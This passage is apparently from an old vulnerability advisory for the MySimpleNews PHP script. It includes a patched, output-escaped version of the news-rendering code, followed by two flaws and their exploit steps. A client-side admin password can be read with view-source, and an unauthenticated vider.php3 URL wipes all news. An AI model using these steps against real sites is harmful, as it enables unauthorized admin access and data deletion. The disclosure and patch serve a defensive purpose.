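    foreach (file(NEWS_FILE, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        $e = json_decode($line, true);
        if (!is_array($e)) {
            continue;   // skip a damaged line rather than abort
        }
        $out .= 'Posted by [' . h((string)($e['login'] ?? '')) . ']<br>'
              . 'On ' . h((string)($e['date'] ?? '')) . '<br>'
              . nl2br(h((string)($e['message'] ?? ''))) . '<hr>';
    }
    return $out;
}

// Only the three expected fields are read, from POST, as strings.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    add_news(
        (string)($_POST['LOGIN'] ?? ''),
        (string)($_POST['DATA'] ?? ''),
        (string)($_POST['MESS'] ?? '')
    );
}
echo render_news();
```

This addresses part (a) only; parts (b) and (c) need a server-side check of who is posting or deleting, which is what the advisory's ".htaccess" patch supplies, and a password kept in the HTML, as in admin.html, provides none.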

b) Recovery of admin's password.
Problem :
°
-- admin.html --
moncode = prompt('MySimpleNews - Administration','');
if (moncode != "[PASSWORD]")
{
location.href="about:Erreur 403";
}
-- admin.html --

Exploit :
°
view-source:http://[target]/admin.html

c) Deleting news.
Problem :
°
No security in the file.

Exploit :
°
http://[target]/vider.php3






Patch :
°°°
Use of htaccess.

More details in french :
http://www.frog-man.org/tutos/MySimpleNews.txt


Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMySimpleNews.txtlangpair=fr%7Cenhl=enie=ISO-8859-1prev=%2Flanguage_tools


frog-m@n

